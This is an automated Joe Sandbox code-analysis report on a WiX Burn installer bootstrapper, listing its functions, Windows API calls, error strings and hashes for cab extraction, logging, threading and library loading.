Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 35d4963d6c619d5dabbda14a962aca36bbace4aad19aa878df49874799db939f
Instruction ID: f48a420bd3b8cc6e2da2b8289cb3d622a12684ca4c9b5dd44ad67964cb1d0ce7
Opcode Fuzzy Hash: 35d4963d6c619d5dabbda14a962aca36bbace4aad19aa878df49874799db939f
Instruction Fuzzy Hash: AF31AEB4942208EBDB119F60ED26FA9FBE0F714749F0201ABE404576B4FFB18845AF54

Function 00BB304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00BB3609,00000000,?,00000000), ref: 00BB3069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B9C025,?,00B75405,?,00000000,?), ref: 00BB3075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00BB30B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB30C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00BB30CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB30D6
CoCreateInstance.OLE32(00BDB6B8,00000000,00000001,00BBB818,?,?,?,?,?,?,?,?,?,?,?,00B9C025), ref: 00BB3111
ExitProcess.KERNEL32 ref: 00BB31C0

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BB30CE
Wow64DisableWow64FsRedirection, xrefs: 00BB30BB
xmlutil.cpp, xrefs: 00BB3099
Wow64EnableWow64FsRedirection, xrefs: 00BB30C3
IsWow64Process, xrefs: 00BB30AF
kernel32.dll, xrefs: 00BB3059

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: c9e748ff331cdd96e645b6e44828ba5eac28ae65fe487526a4924c1e66325a6e
Instruction ID: 3bc1bb4a85a8a3fa4a52574ed3f9892976f5de9e93c23ed08c97c374ad12cab0
Opcode Fuzzy Hash: c9e748ff331cdd96e645b6e44828ba5eac28ae65fe487526a4924c1e66325a6e
Instruction Fuzzy Hash: 1F416235A01215ABDB249BA9C895FFEB7E8EF44B10F1541E9E901EB350DBF1DE408B90

Function 00BAFCAE Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 76
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00BAFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 00BAFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00BAFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00BAFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00BAFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00BAFD8B

Strings

SystemFunction041, xrefs: 00BAFCD8
AdvApi32.dll, xrefs: 00BAFCB5
cryputil.cpp, xrefs: 00BAFD60
Crypt32.dll, xrefs: 00BAFD0C
SystemFunction040, xrefs: 00BAFCCB
CryptProtectMemory, xrefs: 00BAFD20
`+s, xrefs: 00BAFCEA, 00BAFCF1, 00BAFD79
CryptUnprotectMemory, xrefs: 00BAFD6C

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+s$cryputil.cpp
API String ID: 4214558900-1410073285
Opcode ID: e15272cf462f4f1fd7b50eeaf0c98534c4a79a20d215201d3c0d75703064d14e
Instruction ID: 84779e26516a35325afb04e3a2162a835a740c03121ef5b5515ca69eac84ec41
Opcode Fuzzy Hash: e15272cf462f4f1fd7b50eeaf0c98534c4a79a20d215201d3c0d75703064d14e
Instruction Fuzzy Hash: 43216532946223D7C7226795BD25FA6EBD0A711B59F0702B7EC44A7270FF608C009A94

Function 00B91741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00B7C3EB,?,00000000,?,00B7C47F), ref: 00B91778
GetLastError.KERNEL32(?,00B7C3EB,?,00000000,?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B91781

Strings

Failed to create begin operation event., xrefs: 00B917AF
cabextract.cpp, xrefs: 00B917A5, 00B917EB, 00B91837
wininet.dll, xrefs: 00B91757
Failed to copy file name., xrefs: 00B91763
Failed to create extraction thread., xrefs: 00B91841
Failed to wait for operation complete., xrefs: 00B91854
Failed to create operation complete event., xrefs: 00B917F5

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 82e536aa828fbe240304322123b42ade825e4070ec756878112d149f7b14b7c8
Instruction ID: 5d9cb27a53fec5e816cbaeca49d5ba2b7a20a3d25b9186de3f8874573cc40afd
Opcode Fuzzy Hash: 82e536aa828fbe240304322123b42ade825e4070ec756878112d149f7b14b7c8
Instruction Fuzzy Hash: 87212E77E4163B77DB21169D4CC6F2769DCEB00BA4B124AF5BD00B7180EBA4DC0065E1

Function 00B908C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00B908F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00B9090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00B9090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00B90912
GetLastError.KERNEL32(?,?), ref: 00B9091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00B9098B
GetLastError.KERNEL32(?,?), ref: 00B90998

Strings

cabextract.cpp, xrefs: 00B90940, 00B909BC
Failed to duplicate handle to cab container., xrefs: 00B9094A
<the>.cab, xrefs: 00B908EB
Failed to open cabinet file: %hs, xrefs: 00B909C9
Failed to add virtual file pointer for cab container., xrefs: 00B90971

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 59260ec636c90496e0545fa5b1932aba16e6c2c1ba6b5debc5fc3795dad2bc28
Instruction ID: 0f85b552474f8e7e8973a0497bf281e9c96fb6560969594a15e432e29beb9885
Opcode Fuzzy Hash: 59260ec636c90496e0545fa5b1932aba16e6c2c1ba6b5debc5fc3795dad2bc28
Instruction Fuzzy Hash: 5F31C33295113ABFEF216A998C49FAABAE8EF04B60F1142A5FD04B7150D7B09D0086E1

Function 00B83F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B83AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00B83FB5,feclient.dll,?,00000000,?,?,?,00B74B12), ref: 00B83B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00B74B12,?,?,00BBB488,?,00000001,00000000,00000000), ref: 00B8404C

Strings

msasn1.dll, xrefs: 00B84162, 00B841A3
feclient.dll, xrefs: 00B83FAF, 00B8405C
Failed to get current directory., xrefs: 00B8402E
Failed to copy log extension to extension., xrefs: 00B84191
log, xrefs: 00B83FF3
Failed to copy full log path to prefix., xrefs: 00B841AF
crypt32.dll, xrefs: 00B83FF2, 00B84057, 00B8405F, 00B840C6, 00B84100, 00B84141, 00B84160, 00B8419E, 00B841C8
Setup, xrefs: 00B83FF9
clbcatq.dll, xrefs: 00B84185
Failed to copy log path to prefix., xrefs: 00B8416E
Failed to get non-session specific TEMP folder., xrefs: 00B840F6
Failed to open log: %ls, xrefs: 00B840C8

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 82bf307e5954ae1fa48030dc090f4c9d5547c9c7409701596e6cb77a828657a9
Instruction ID: cbee2f49162dd8b9fbd1a8af5fcedcbce8eb182f8e5a4c07aec762ba4f002604
Opcode Fuzzy Hash: 82bf307e5954ae1fa48030dc090f4c9d5547c9c7409701596e6cb77a828657a9
Instruction Fuzzy Hash: 72618271A00616ABDF25BB64CC86B7B7BE8EF10740B1481E9F905EB160E7B1ED90C791

Function 00B76DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00B75445,00000006,?,00B782B9,?,?,?,00000000,00000000,00000001), ref: 00B76DC8

Part of subcall function 00B756A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00B76595,00B76595,?,00B7563D,?,?,00000000), ref: 00B756E5
Part of subcall function 00B756A9: GetLastError.KERNEL32(?,00B7563D,?,?,00000000,?,?,00B76595,?,00B77F02,?,?,?,?,?), ref: 00B75714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00B782B9), ref: 00B76F59

Strings

variable.cpp, xrefs: 00B76E4B
Setting hidden variable '%ls', xrefs: 00B76E86
Failed to find variable value '%ls'., xrefs: 00B76DE3
Attempt to set built-in variable value: %ls, xrefs: 00B76E56
Setting numeric variable '%ls' to value %lld, xrefs: 00B76EFA
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00B76ED0
Failed to insert variable '%ls'., xrefs: 00B76E0D
Unsetting variable '%ls', xrefs: 00B76F15
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00B76F6B
Failed to set value of variable: %ls, xrefs: 00B76F41
Setting string variable '%ls' to value '%ls', xrefs: 00B76EED

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 7b78f00c715252e91535358c59767ab9ababadb56ac8c41d3733787bd20fa32f
Instruction ID: f79f7d70b9db32a87e5d0a4133ee5284499b8da2b82722e6c9b9fdb99e66467a
Opcode Fuzzy Hash: 7b78f00c715252e91535358c59767ab9ababadb56ac8c41d3733787bd20fa32f
Instruction Fuzzy Hash: 2C510A71A00615ABDB30DE15DC4AFBB7BE8EB55710F1081D9F82D5A281D2B5DD40CAE1

Function 00B74AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00B74C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B74C75

Strings

WixBundleLayoutDirectory, xrefs: 00B74BF5
Failed to set registration variables., xrefs: 00B74BDE
Failed to check global conditions, xrefs: 00B74B49
Failed to open log., xrefs: 00B74B18
Failed to create the message window., xrefs: 00B74B98
Failed to set action variables., xrefs: 00B74BC4
Failed to set layout directory variable to value provided from command-line., xrefs: 00B74C06
Failed to query registration., xrefs: 00B74BAE
Failed while running , xrefs: 00B74C2A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 3f101c1117051ce0105b32966141226c52815b825c8d13a6ac386110f48b2441
Instruction ID: a67ab91af348fbfae87d0cc83ac0a7b87a1c9ef9fe9cddf9bc0a9220f813d4ef
Opcode Fuzzy Hash: 3f101c1117051ce0105b32966141226c52815b825c8d13a6ac386110f48b2441
Instruction Fuzzy Hash: FC41C63164161ABBCB176A34CC85FBAB6ECFB04752F00C2A5F829A6160DBF0ED1497D0

Function 00B72DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00B72E5F
GetLastError.KERNEL32 ref: 00B72E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00B72F09
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00B72F96
GetLastError.KERNEL32 ref: 00B72FA3
Sleep.KERNEL32(00000064), ref: 00B72FB7
CloseHandle.KERNEL32(?), ref: 00B7301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00B72F66
pathutil.cpp, xrefs: 00B72E8D
4Wu, xrefs: 00B72E5F

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Wu$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-3300617194
Opcode ID: 8690593fc5e1216de9297ae8b175b8d2552526c0bf916d6af2c9d0103e481579
Instruction ID: 441dc21d6887ee6ce7a65eac9a7ce2b4444072a2aaa89890e979c20c4ffa49ec
Opcode Fuzzy Hash: 8690593fc5e1216de9297ae8b175b8d2552526c0bf916d6af2c9d0103e481579
Instruction Fuzzy Hash: AF715372D01129ABDB319B58DC89BAEB7F8EB08710F1082E5F929B7190D7749E80DF50

Function 00B8EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00B7548E,?,?), ref: 00B8EA9D
GetLastError.KERNEL32(?,00B7548E,?,?), ref: 00B8EAAA
CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00B8EB03
GetLastError.KERNEL32(?,00B7548E,?,?), ref: 00B8EB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00B7548E,?,?), ref: 00B8EB4B
CloseHandle.KERNEL32(00000000,?,00B7548E,?,?), ref: 00B8EB6A
CloseHandle.KERNELBASE(?,?,00B7548E,?,?), ref: 00B8EB77

Strings

Failed to create the UI thread., xrefs: 00B8EB3B
uithread.cpp, xrefs: 00B8EACB, 00B8EB31
Failed to create initialization event., xrefs: 00B8EAD5

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 6db8cc34cd0a8ffba126f963fbf3fd1c0d5ba13ea0ee324b05024d9fda65b421
Instruction ID: 952b7a31f833a02abafbc0fcc3d2ff7df2d75f14da6d8f76578ddcde51eda5b7
Opcode Fuzzy Hash: 6db8cc34cd0a8ffba126f963fbf3fd1c0d5ba13ea0ee324b05024d9fda65b421
Instruction Fuzzy Hash: 2C31A376D0122ABBDB10AF998C85EAEBAE8FF04750F1141A9B915F7250E6709E00C7A1

Function 00B914E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,75572F60,?,?,00B75405,00B753BD,00000000,00B75445), ref: 00B91506
GetLastError.KERNEL32 ref: 00B91519
GetExitCodeThread.KERNELBASE(00BBB488,?), ref: 00B9155B
GetLastError.KERNEL32 ref: 00B91569
ResetEvent.KERNEL32(00BBB460), ref: 00B915A4
GetLastError.KERNEL32 ref: 00B915AE

Strings

cabextract.cpp, xrefs: 00B91540, 00B91590, 00B915D5
Failed to reset operation complete event., xrefs: 00B915DF
Failed to wait for operation complete event., xrefs: 00B9154A
Failed to get extraction thread exit code., xrefs: 00B9159A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 2b90d40d4810f1213f51ef4d5c6b419599477c562c8568faf5e21162e1119db3
Instruction ID: 184db7095ca6fcc0d628e16252e6841fb9f272fa3fd42aff1072956ef72e34e0
Opcode Fuzzy Hash: 2b90d40d4810f1213f51ef4d5c6b419599477c562c8568faf5e21162e1119db3
Instruction Fuzzy Hash: AA318671B40206EBDF109F698D45FBE7BF8EB54710B1285AAF906D6160EBB0DE00AB51

Function 00B7CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00B753BD,00000000,00B75489,00B75445,WixBundleUILevel,840F01E8,?,00000001), ref: 00B7CC1C

Strings

Failed to get directory portion of local file path, xrefs: 00B7CCF5
payload.cpp, xrefs: 00B7CD1D
Failed to extract file., xrefs: 00B7CCE7
Failed to get next stream., xrefs: 00B7CD03
Payload was not found in container: %ls, xrefs: 00B7CD29
Failed to concat file paths., xrefs: 00B7CCFC
Failed to find embedded payload: %ls, xrefs: 00B7CC48
Failed to ensure directory exists, xrefs: 00B7CCEE

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: da159b09275e71258ada2d7aa49957b5c0b0c095ac34f377d260bc24add9c36e
Instruction ID: 6ca771296c52376c132407a6a8658c63f9ccdaaf06ce49ce57dd7d07f5cc53fc
Opcode Fuzzy Hash: da159b09275e71258ada2d7aa49957b5c0b0c095ac34f377d260bc24add9c36e
Instruction Fuzzy Hash: ED417931940619ABCF269F58CC819BEBFE5EF00710B11C1FDE829AB261D7B09E40DB91

Function 00B74796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00B747BB
GetCurrentThreadId.KERNEL32 ref: 00B747C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B7484F

Strings

wininet.dll, xrefs: 00B747EE
engine.cpp, xrefs: 00B7489B
Unexpected return value from message pump., xrefs: 00B748A5
Failed to create engine for UX., xrefs: 00B747DB
Failed to load UX., xrefs: 00B74804
Failed to start bootstrapper application., xrefs: 00B7481D

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 0ba728e594bcbe3caf47328be0ec7ea5b3b4ae6202f4c99e92d1892337f3c9b1
Instruction ID: 4085b7454e39b3abce6fe015115170d85777a6113d0f74f08c144e69b9b4474d
Opcode Fuzzy Hash: 0ba728e594bcbe3caf47328be0ec7ea5b3b4ae6202f4c99e92d1892337f3c9b1
Instruction Fuzzy Hash: 0141B671A00559BFDB149BA4CC85EBAB7ECEF04315F1082A5F928E7290DB70AD0587A1

Function 00B7D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00B747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00B7548E,?), ref: 00B7D6DA
GetLastError.KERNEL32(?,00B747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00B7548E,?,?), ref: 00B7D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00B7D71F
GetLastError.KERNEL32(?,00B747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00B7548E,?,?), ref: 00B7D72B

Strings

BootstrapperApplicationCreate, xrefs: 00B7D719
userexperience.cpp, xrefs: 00B7D708, 00B7D74C
Failed to create UX., xrefs: 00B7D76F
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 00B7D756
Failed to load UX DLL., xrefs: 00B7D712

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

